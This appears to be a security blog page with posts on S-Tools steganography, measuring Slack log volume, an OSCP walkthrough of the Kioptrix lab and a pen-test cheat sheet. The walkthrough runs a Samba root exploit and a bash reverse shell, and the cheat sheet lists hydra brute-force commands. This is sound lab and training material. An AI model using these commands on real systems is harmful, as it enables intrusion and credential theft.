Hiding in plain sight

Steganography is about hiding content inside other content.

At work, bad folk might use it to sneak things outside the company, or just to hide bad things on their machine.

They probably won’t though, because it’s a lot of effort and there are other ways to steal data.

or will they…

This week I needed to look at some sneaky files in the context of digital forensics.

I thought the topic was interesting enough that I should jot down the key points.

Before I do, I should mention that there are much better articles covering the topic in detail. You should try these two if you want to learn a lot more:

  • http://www.garykessler.net/library/steganography.html
  • http://www.garykessler.net/library/fsc_stego.html

The only aim of this post is to capture a practical way to mess about with this stuff for yourself.

I will just mention one key theory point first though:

When someone uses steganography to hide one file inside another, you might expect the resulting file to be bigger. That’s possible, but it’s often not the case. One common approach (built into free tools) is to take the file you are hiding and distribute its bits among sets of bytes in the host file. The number of bytes does not change, just some of the bits within those bytes. If the bad guy modifies the least significant bit of selected bytes in a .bmp file, for example, the file will not grow, and the difference to the color palette in the image will be barely noticeable if the right image is used.
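The trick above can be sketched in a few lines of Python. This is a toy illustration working on a raw byte string rather than a real .bmp (the helper names and sample data are made up, and real tools like S-Tools also encrypt and scatter the bits), but it shows why the carrier never grows:

```python
def embed_lsb(carrier: bytes, secret: bytes) -> bytes:
    # Spread each secret byte across the least significant bits of
    # 8 carrier bytes. The carrier's length never changes; only the
    # lowest bit of some bytes does.
    if len(secret) * 8 > len(carrier):
        raise ValueError("carrier too small to hold the secret")
    out = bytearray(carrier)
    for i, byte in enumerate(secret):
        for bit in range(8):
            j = i * 8 + bit
            out[j] = (out[j] & 0xFE) | ((byte >> bit) & 1)
    return bytes(out)

def extract_lsb(carrier: bytes, length: int) -> bytes:
    # Reassemble each hidden byte from 8 consecutive LSBs.
    secret = bytearray()
    for i in range(length):
        byte = 0
        for bit in range(8):
            byte |= (carrier[i * 8 + bit] & 1) << bit
        secret.append(byte)
    return bytes(secret)

pixels = bytes(range(256))        # stand-in for .bmp pixel data
stego = embed_lsb(pixels, b"moo")
print(len(pixels), len(stego))    # same size before and after
print(extract_lsb(stego, 3))      # the hidden bytes come back out
```

Each carrier byte changes by at most 1, which is why the image looks identical to the eye.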

Step 1: Download S-Tools. It’s free, and you can find it in lots of other places if downloading it from here seems weird. (I don’t blame you if you don’t trust my download; I wouldn’t trust a random file from a blog either.)

Step 2: Find a carrier file and drag it into S-Tools. I chose this cow; no one ever suspects the cow. (Note that S-Tools tells me how much data this cow could stash.)

Step 3: Drag the file you need to hide onto the file you are hiding it in (in s-tools). You will be prompted for a passphrase to further protect the secret file.

Step 4: Save the new file (by right clicking on the “hidden data” version and choosing “save as”).

I called mine just_a_cow.bmp when I saved it so that no one would think to examine it more carefully.

(Notice the file size is the same, and the image quality too: modifying a few bits inside sets of bytes of the original means there is no real noticeable difference.)

You can download the file containing the secret file from here: just_a_cow.bmp if you’d like to examine it for yourself. The password on the secret file inside the cow is “duck”.

To examine a file like just_a_cow.bmp, you just do the same thing as hiding stuff. Open s-tools, drag in the file, then right click the file to reveal the content. You should find some super secret tips inside that just_a_cow.bmp file if you are interested.

Cheeky buggers.


I’m tweaking the collection of data relating to activities inside our corporate Slack team. I was particularly interested in volume. For example, if someone asked us to capture the metadata associated with every party-parrot reaction to a Slack message, how much storage (and processing power) would I need to budget on the corporate log management platform?

I should mention before I start to blab that there are probably great commercial products for this kind of work, and if you are short on time you should look into them. However, if you set aside an afternoon to mess about with a tiny amount of code and a whole heap of JSON, you’ll have a lot more fun.

The first thing to know is that most (maybe all?) of the Slack API messages are delivered as JSON.

An event record that captures a reaction would look like this when the API serves it up:
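A payload for a reaction_added event subscription has roughly this shape; all the tokens, IDs, and timestamps below are made up:

```json
{
    "token": "XXYYZZ",
    "team_id": "T123ABC",
    "api_app_id": "A123ABC",
    "type": "event_callback",
    "event_time": 1507913000,
    "event": {
        "type": "reaction_added",
        "user": "U12345",
        "reaction": "partyparrot",
        "item_user": "U67890",
        "item": {
            "type": "message",
            "channel": "C12345",
            "ts": "1507912986.000123"
        },
        "event_ts": "1507913000.000200"
    }
}
```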

The second thing to consider is that for my use case (determining data volume) there are a couple of good avenues to pursue.

  1. Use the events API. You subscribe to the events that you care about, and Slack serves them up as they happen.
  2. Use the team.accesslogs HTTP-RPC endpoint. You ask Slack for a date range, and Slack tells you everyone who logged in during that range.

Events API:

For the events API, there was a really great tutorial available. The tutorial is easy to follow and will get you up and running fast. It covers everything from choosing the events you are interested in (the ones you want your application to ‘subscribe’ to), all the way to setting up a reverse proxy with ngrok (don’t worry, it’s a one-line command) so that your application can receive events while it is running on your laptop.

Once I had the tutorial up and running, the only tinkering I needed to do was to adjust the routes that I cared about. As an example, while I was looking at reactions to Slack messages my example.py file looked like this:

from slackeventsapi import SlackEventAdapter
import json
import os
import pprint

# Verification token read from the environment rather than hard-coded
SLACK_VERIFICATION_TOKEN = os.environ["SLACK_VERIFICATION_TOKEN"]
slack_events_adapter = SlackEventAdapter(SLACK_VERIFICATION_TOKEN, "/slack/events")

total_size = 0

def display_total(size):
    print("-" * 47)
    print(size, "bytes sent from slack events so far")
    print("(", size / 1024 / 1024, "MB so far)")
    print("-" * 47)

@slack_events_adapter.on("reaction_added")
def reaction_added(event_data):
    global total_size
    json_obj = json.dumps(event_data)
    json_size = len(json_obj)
    total_size = total_size + json_size
    print("The size of this object is:", json_size)
    pprint.PrettyPrinter(indent=4).pprint(event_data)
    display_total(total_size)

slack_events_adapter.start(port=3000)

(Screenshot: live event subscription for ‘reactions’ to messages in Slack. We used variations on the code above to measure the volume over a period of time, as well as the processing required to handle this at scale.)
(Screenshot: the ngrok tunnel allowing Slack to deliver messages from out on the internet to the application running on my laptop.)

With all the awesome work the Slack developer evangelists did with that tutorial, variations on the model above were about all I needed to measure event subscription volume and get a really good idea how much it would cost to include various Slack events in our central log platform. (FWIW, we don’t really care about message reactions; this is just an example.)

The team.accesslogs HTTP-RPC endpoint:

Flipping it around a little, Slack also offers traditional HTTP-RPC endpoints that let us ask the questions, rather than Slack tapping us on the shoulder when stuff happens.

The team.accesslogs method is the one that tells us who logged in: where, when, and from what device. It’s not a stretch to imagine this is an interesting endpoint for most security teams. The data you get back from Slack looks like this:

    {
        "user_id": "U12345",
        "username": "bob",
        "date_first": 1422922864,
        "date_last": 1422922864,
        "count": 1,
        "ip": "",
        "user_agent": "SlackWeb Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.35 Safari/537.36",
        "isp": "BigCo ISP",
        "country": "US",
        "region": "CA"
    }

I have the same goal in mind with this endpoint: if I want to store this stuff, I need to know how many events like this we generate per day (on average).
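Back of the envelope, the calculation is just: measure one serialized record, multiply by the expected daily event count. A sketch (the record mirrors the shape above; the 5,000 events/day figure is a made-up placeholder):

```python
import json

# A made-up login record matching the team.accesslogs shape above
record = {
    "user_id": "U12345", "username": "bob",
    "date_first": 1422922864, "date_last": 1422922864,
    "count": 1, "ip": "203.0.113.10",
    "user_agent": "SlackWeb Mozilla/5.0 (Macintosh) Chrome/41.0",
    "isp": "BigCo ISP", "country": "US", "region": "CA",
}

bytes_per_event = len(json.dumps(record))   # size of one serialized record
events_per_day = 5000                       # hypothetical daily volume
mb_per_day = bytes_per_event * events_per_day / 1024 / 1024
print(bytes_per_event, "bytes/event, ~%.2f MB/day" % mb_per_day)
```

Swap in your own measured average event count and the storage budget falls out directly.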

Slack authorization tokens for this type of thing can be retrieved from here. (They can be revoked from here by going to “tester” and issuing the sample API call to kill the token for your team).

Once I had a token, I settled with some skeleton code that looked like this:

import json
import requests
import time

url = "https://slack.com/api/"
method = "team.accessLogs"
token = "{your token here}"
pretty = 1
page = 1

total_size = 0

for _ in range(100):

    payload = {"token": token, "pretty": pretty, "page": page}
    r = requests.get(url + method, params=payload)
    json_version = r.json()
    # Measure the raw response text; len() of the parsed dict
    # would only count its top-level keys.
    response_size = len(r.text)
    total_size = total_size + response_size
    print("Size: " + str(response_size))
    for event in json_version["logins"]:
        print("Name: " + str(event["username"]))
        print("IP: " + str(event["ip"]))
        formatted_time = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(event["date_last"]))
        print("Date: " + str(formatted_time))
        print("")

    page = page + 1

print("Total Size: " + str(total_size))

Nothing really special there, but hopefully the template saves someone a little time getting up and running. Variations on this let me narrow things down to the information that mattered most for our security program: we added code to bucket the volume by day, filtered various things, and took measurements to understand how often we would need to pull from the endpoint to pick up an efficient next set of data each time. From there we could project the average daily volume this type of event would add, and make some assumptions about the rate of growth over time.
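The bucket-by-day step mentioned above is only a few lines. A sketch, assuming the same logins shape as the team.accessLogs response (the sample events are made up):

```python
from collections import defaultdict
import time

# Hypothetical login events, same shape as the team.accessLogs response
logins = [
    {"username": "bob", "date_last": 1422922864},
    {"username": "alice", "date_last": 1422922999},
    {"username": "bob", "date_last": 1423009264},
]

# Count events per calendar day (UTC, to keep buckets stable)
per_day = defaultdict(int)
for event in logins:
    day = time.strftime("%Y-%m-%d", time.gmtime(event["date_last"]))
    per_day[day] += 1

for day, count in sorted(per_day.items()):
    print(day, count)
```

From daily counts like these, averages and growth trends are a simple follow-on calculation.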

All in all, a good detour from the typical Thursday afternoon, and we now have a good understanding of how much extra space and processing we need to add Slack data to our logging systems.

OSCP practice: Vulnhub – Kioptrix Level 1

My OSCP exam is fast approaching. For extra practice I am going to start working through the relevant vulnhub machines.

A list of Vulnhub machines that are similar to the OSCP can be found here.

Starting right at the beginning with: Kioptrix Level 1

I used the free vmware workstation edition and created a new private network. I moved my Kali machine and Kioptrix into that network. (I also have a basic DHCP/DNS server in there).

Starting with a scan to find the machine:

netdiscover -r

Nmap scan of our discovered target:

nmap -p- -sV -sS -T4 -A

22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/http    Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
1024/tcp open  status      1 (RPC #100024)

We seem to have:

  • OpenSSH 2.9
  • RPC & SMB (via Samba)

Starting a quick scan of the HTTP and SMB ports via dirb and enum4linux to build out the list of possible attack surfaces:


The most interesting thing in the scan is the version of Samba.

The latest version on the Samba site is 4.7.0. The version on this server is 2.2.1a, which is really old: looking at the Samba site, it dates from 2001 and was designed with Windows 2000 enhancements in mind.


Quick manual check of the interesting pages:

At this point we have a handful of attack surfaces to explore:

  • Old Samba (2.2.1a)
  • Old’ish Apache (Apache httpd 1.3.20)
  • Webalizer 2.01

The really old Samba is particularly interesting, so let's start there:

searchsploit samba 2.2

Remote root exploit sounds perfect. Inspecting the code to see if there is manual work to do; it seems ready to go as-is.

Compiled with: gcc 10.c -o sambaexploit

Execute with: ./sambaexploit -b 0 -v

It seems to have worked. We don’t have an interactive shell (tried an ls command), but we appear to be able to execute commands.

Set up a local listener: nc -nlvp 443

Execute reverse shell via the exploit prompt: bash -i >& /dev/tcp/ 0>&1

Success – interactive reverse shell (as root):


Hashcat password cracking quick start:

  1. Download from here.
  2. Install on Windows machine.
  3. Search the example hashes to find the code matching the hash you located.
  4. hashcat64 -m {code} {path to the hash you found} {path to your password file} --force
  5. Example command: hashcat64 -m 1600 c:\Users\cd\Desktop\hashes.txt c:\Users\cd\Desktop\rockyou.txt --force

Every Pen-Test: Enumeration Reminders


dirb http://site.com {wordlist-optional}

/usr/share/dirb/wordlists /usr/share/dirb/wordlists/vulns
eg: /usr/share/dirb/wordlists/vulns/coldfusion.txt

nikto -h

if wordpress:

General connection enumeration:
nc 80 (then)

For SSL:
openssl s_client -quiet -connect site.com:443

davtest -cleanup -url
cadaver (webdav client)


Zone transfer:

dig server.domain.com domain.com axfr


nmap -sV -Pn -vv -p 21 --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221 -oN 'ftp.nmap'

hydra -L wordlists/user_list -P wordlists/pass_list -f -o ftpTests.txt -u -s 21 ftp



nbtscan -r


nmap -vv -sV -Pn -p 25,465,587 --script=smtp-vuln*



snmpwalk -c public -v1 1 > snmpwalk.txt

nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes


hydra -L wordlists/user_list -P wordlists/pass_list -f -o sshTest.txt -u -s 22 ssh


epdump example.com


(linux) rpcinfo -p


nmbscan -a


rpcinfo -p host

SIPDump, SIPCrack

The archive

A big list of things from the past:


Microsoft Tech-Ed: Windows Server 2012 Direct Access


XPERF Windows boot tracing

Identifying accounts with Kerberos Pre-Authentication disabled

Direct Access: when you make it work, then it stops

Tricking your Windows test machines to think they are connected to the internet

“Real World” Direct Access

Un-Host and Re-Host Active Directory partitions

Granular AD Replication scenarios – Advanced Troubleshooting

Network tracing without installing anything (ETL)

Active Directory: Change notification, and you.

Kerberos Troubleshooting

Windows Debugger: Beware verifier settings

Quick and nasty 1000 users via Powershell

Locating the Inter-Site Topology Generators

Dumping the Active Directory Database

Windows Auditing in 2008 and above

Testing the DCLocator function

Multiple Read Only Domain Controllers in a single site?

Active Directory: Adding attributes to the filtered attribute set

Troubleshooting ports with portqry.exe

Group policy Notes

Kerberos Delegation

Kerberos Notes

Domain controller is slow to start “Preparing Network Connections”